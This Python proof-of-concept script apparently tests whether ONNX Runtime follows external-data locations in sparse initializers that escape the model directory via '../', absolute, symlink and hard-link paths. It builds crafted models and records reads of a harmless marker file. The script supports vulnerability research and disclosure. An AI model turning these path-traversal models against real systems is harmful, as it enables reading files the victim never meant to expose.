| from __future__ import annotations |
|
|
| import hashlib |
| import os |
| import shutil |
| import subprocess |
| import sys |
| from pathlib import Path |
|
|
| import numpy as np |
| import onnx |
| import onnxruntime as ort |
| from onnx import TensorProto, helper, numpy_helper |
|
|
|
|
# Directory that contains this script; every generated fixture lives below it.
ROOT = Path(__file__).resolve().parents[0]
# Directory the generated .onnx models and their in-directory data files go to.
MODEL_DIR = ROOT.joinpath("model_dir")
# Sibling directory holding the data file the escape cases try to reach.
OUTSIDE_DIR = ROOT.joinpath("outside_dir")
# Recognisable payload written to the data files and searched for in probe output.
MARKER = b"ORT_SPARSE_INITIALIZER_EXT_READ"
|
|
|
|
def sha256(path: Path) -> str:
    """Return the hex-encoded SHA-256 digest of the file at *path*.

    The file is hashed in fixed-size chunks so that memory use stays bounded
    regardless of file size; the digest is identical to hashing the whole
    content at once.

    Args:
        path: File to hash.

    Returns:
        The lowercase hexadecimal digest string.

    Raises:
        OSError: If the file cannot be opened or read.
    """
    chunk_size = 1 << 20  # 1 MiB per read
    digest = hashlib.sha256()
    with path.open("rb") as stream:
        # iter() with a sentinel stops at the first empty read (end of file).
        for chunk in iter(lambda: stream.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
|
|
|
|
def make_external_values(location: str) -> TensorProto:
    """Build the values tensor of the sparse initializer, stored externally.

    The tensor is named ``sparse_init``, has element type UINT8 and one
    dimension of ``len(MARKER)`` elements. It carries no inline data: its
    ``external_data`` entries point at *location* with offset ``0`` and a
    length of ``len(MARKER)`` bytes.

    Args:
        location: Value stored verbatim in the ``location`` external-data entry.

    Returns:
        The populated ``TensorProto``.
    """
    byte_count = len(MARKER)
    tensor = TensorProto(
        name="sparse_init",
        data_type=TensorProto.UINT8,
        dims=[byte_count],
        data_location=TensorProto.EXTERNAL,
    )
    external_entries = (
        ("location", location),
        ("offset", "0"),
        ("length", str(byte_count)),
    )
    for entry_key, entry_value in external_entries:
        tensor.external_data.add(key=entry_key, value=entry_value)
    return tensor
|
|
|
|
def make_model(model_path: Path, location: str) -> None:
    """Write a one-node ONNX model whose sparse initializer uses external data.

    The graph has no inputs. Its only node is an ``Identity`` that copies the
    sparse initializer ``sparse_init`` to the output ``out``. The initializer's
    values tensor comes from ``make_external_values(location)``.

    Args:
        model_path: Destination file for the serialized model.
        location: External-data location recorded in the values tensor.
    """
    element_count = len(MARKER)

    # One index per marker byte, laid out as an (element_count, 1) int64 column.
    index_tensor = numpy_helper.from_array(
        np.arange(element_count, dtype=np.int64).reshape((element_count, 1)),
        name="sparse_indices",
    )
    sparse_init = helper.make_sparse_tensor(
        make_external_values(location),
        index_tensor,
        [element_count],
    )

    graph = helper.make_graph(
        nodes=[helper.make_node("Identity", inputs=["sparse_init"], outputs=["out"])],
        name="sparse_initializer_external",
        inputs=[],
        outputs=[
            helper.make_tensor_value_info("out", TensorProto.UINT8, [element_count])
        ],
        sparse_initializer=[sparse_init],
    )

    model_proto = helper.make_model(
        graph,
        producer_name="onnx-ort-sparse-initializer-external-poc",
        opset_imports=[helper.make_opsetid("", 18)],
    )
    model_proto.ir_version = 10
    onnx.save_model(model_proto, model_path)
|
|
|
|
def build_cases() -> dict[str, Path]:
    """Recreate the fixture directories and generate one model per case.

    ``MODEL_DIR`` and ``OUTSIDE_DIR`` are deleted if present and created anew.
    The marker payload is written to ``OUTSIDE_DIR/marker.bin`` and to
    ``MODEL_DIR/inside.bin``. Inside ``MODEL_DIR`` a directory symlink
    ``link_parent`` pointing at ``../outside_dir`` and a hard link
    ``hardlink.bin`` to the outside marker are created.

    Returns:
        Mapping from case name to the path of the generated ``.onnx`` file.
    """
    # Start from empty directories so leftovers of earlier runs cannot interfere.
    for directory in (MODEL_DIR, OUTSIDE_DIR):
        if directory.exists():
            shutil.rmtree(directory)
        directory.mkdir(parents=True)

    marker_outside = OUTSIDE_DIR / "marker.bin"
    marker_outside.write_bytes(MARKER)
    (MODEL_DIR / "inside.bin").write_bytes(MARKER)
    os.symlink("../outside_dir", MODEL_DIR / "link_parent", target_is_directory=True)
    os.link(marker_outside, MODEL_DIR / "hardlink.bin")

    # Case name -> external-data location string embedded in that case's model.
    locations = {
        "inside_regular": "inside.bin",
        "dotdot_escape": "../outside_dir/marker.bin",
        "absolute_escape": str(marker_outside.resolve()),
        "parent_symlink_escape": "link_parent/marker.bin",
        "hardlink_escape": "hardlink.bin",
    }
    model_paths: dict[str, Path] = {
        case: MODEL_DIR / f"{case}.onnx" for case in locations
    }
    for case, location in locations.items():
        make_model(model_paths[case], location)
    return model_paths
|
|
|
|
def _stream_text(stream: object) -> str:
    """Normalise a captured stream that may be ``None``, bytes or text to ``str``."""
    if stream is None:
        return ""
    if isinstance(stream, bytes):
        return stream.decode(errors="replace")
    return str(stream)


def run(
    code: str,
    cwd: Path,
    *args: Path | str,
    timeout: float = 30,
) -> subprocess.CompletedProcess[str]:
    """Execute *code* with ``python -c`` in a fresh interpreter and capture output.

    A child that exceeds *timeout* is reported as a failed result instead of
    raising, so one hung probe cannot abort the remaining ones.

    Args:
        code: Python source passed to the interpreter's ``-c`` option.
        cwd: Working directory of the child process.
        *args: Extra command-line arguments; each is converted with ``str``.
        timeout: Seconds to wait for the child before giving up.

    Returns:
        The completed process with text ``stdout``/``stderr``. The exit status
        is not checked. On timeout the result has return code ``124``, any
        partial output captured so far, and a ``timed out`` note appended to
        ``stderr``.
    """
    command = [sys.executable, "-c", code, *map(str, args)]
    try:
        return subprocess.run(
            command,
            cwd=cwd,
            text=True,
            capture_output=True,
            check=False,
            timeout=timeout,
        )
    except subprocess.TimeoutExpired as exc:
        # The partial output attached to the exception can be bytes even in
        # text mode, hence the normalisation.
        note = f"timed out after {timeout}s"
        partial_stderr = _stream_text(exc.stderr)
        return subprocess.CompletedProcess(
            command,
            124,  # non-zero, so a timed-out probe is never mistaken for a success
            stdout=_stream_text(exc.stdout),
            stderr=f"{partial_stderr}\n{note}" if partial_stderr else note,
        )
|
|
|
|
def emit(name: str, result: subprocess.CompletedProcess[str]) -> None:
    """Print the return code, stdout and stderr of *result* as ``key=value`` lines.

    Each captured stream is stripped of surrounding whitespace and its
    remaining newlines are replaced by ``" | "`` so that it fits on one line.

    Args:
        name: Prefix for the three printed keys (``_rc``, ``_stdout``, ``_stderr``).
        result: Completed process whose outcome is reported.
    """

    def one_line(text: str) -> str:
        return " | ".join(text.strip().split("\n"))

    print(
        f"{name}_rc={result.returncode}",
        f"{name}_stdout={one_line(result.stdout)}",
        f"{name}_stderr={one_line(result.stderr)}",
        sep="\n",
    )
|
|
|
|
def main() -> int:
    """Build the fixtures, probe every model in child interpreters, and report.

    For each generated model, five probes run in separate Python processes:
    the ONNX checker, ``onnx.load``, and three ONNX Runtime session variants
    (relative model path, absolute model path, model bytes plus an external
    initializer folder setting). Every probe's outcome is printed.

    A "hit" is recorded when an ONNX Runtime probe of any case other than
    ``inside_regular`` exits with status 0 and its stdout contains the marker.

    Returns:
        ``0`` if at least one hit was recorded, otherwise ``1``.
    """
    model_paths = build_cases()
    marker_outside = OUTSIDE_DIR / "marker.bin"
    hardlink_path = MODEL_DIR / "hardlink.bin"

    # Environment and fixture summary.
    print(f"python={sys.version.split()[0]}")
    print(f"onnx={onnx.__version__}")
    print(f"onnxruntime={ort.__version__}")
    print(f"case_dir={ROOT}")
    print(f"outside_marker={marker_outside}")
    print(f"outside_marker_sha256={sha256(marker_outside)}")
    hardlink_stat = os.stat(hardlink_path)
    print(f"hardlink_count={hardlink_stat.st_nlink}")
    print(f"hardlink_same_inode={hardlink_stat.st_ino == os.stat(marker_outside).st_ino}")

    # Snippets executed via ``python -c``; argv[1] is the model, argv[2] (only
    # in the last snippet) the folder configured for external initializers.
    checker_snippet = """
import onnx, sys
onnx.checker.check_model(sys.argv[1])
print("checker_ok")
"""
    load_snippet = """
import onnx, sys
model = onnx.load(sys.argv[1])
print("load_ok")
"""
    ort_snippet = """
import onnxruntime as ort, sys
sess = ort.InferenceSession(sys.argv[1], providers=["CPUExecutionProvider"])
out = sess.run(None, {})[0]
print(bytes(out.tolist()).decode("ascii", errors="replace"))
"""
    ort_bytes_snippet = """
import onnxruntime as ort, sys
so = ort.SessionOptions()
so.add_session_config_entry("session.model_external_initializers_file_folder_path", sys.argv[2])
data = open(sys.argv[1], "rb").read()
sess = ort.InferenceSession(data, so, providers=["CPUExecutionProvider"])
out = sess.run(None, {})[0]
print(bytes(out.tolist()).decode("ascii", errors="replace"))
"""

    marker_text = MARKER.decode("ascii")
    hits: list[str] = []
    for case, model_path in model_paths.items():
        print(f"{case}:model={model_path}")
        print(f"{case}:model_sha256={sha256(model_path)}")

        # (label, snippet, working directory, command-line arguments)
        probes = [
            ("onnx_checker", checker_snippet, MODEL_DIR, [model_path.name]),
            ("onnx_load", load_snippet, MODEL_DIR, [model_path.name]),
            ("ort_file_relative", ort_snippet, MODEL_DIR, [model_path.name]),
            ("ort_file_absolute", ort_snippet, ROOT, [model_path]),
            ("ort_bytes_with_folder", ort_bytes_snippet, ROOT, [model_path, MODEL_DIR]),
        ]
        for label, snippet, workdir, argv in probes:
            outcome = run(snippet, workdir, *argv)
            emit(f"{case}_{label}", outcome)

            # Only runtime probes of the non-baseline cases can count as hits.
            is_escape_case = case != "inside_regular"
            is_runtime_probe = label.startswith("ort_")
            marker_read = outcome.returncode == 0 and marker_text in outcome.stdout
            if is_escape_case and is_runtime_probe and marker_read:
                hits.append(f"{case}:{label}")

    if not hits:
        print("impact=no_sparse_initializer_external_data_bypass")
        return 1

    print(f"impact=sparse_initializer_external_data_bypass:{','.join(hits)}")
    return 0
|
|
|
|
# Script entry point: the process exit status is whatever main() returns.
if __name__ == "__main__":
    sys.exit(main())
|
|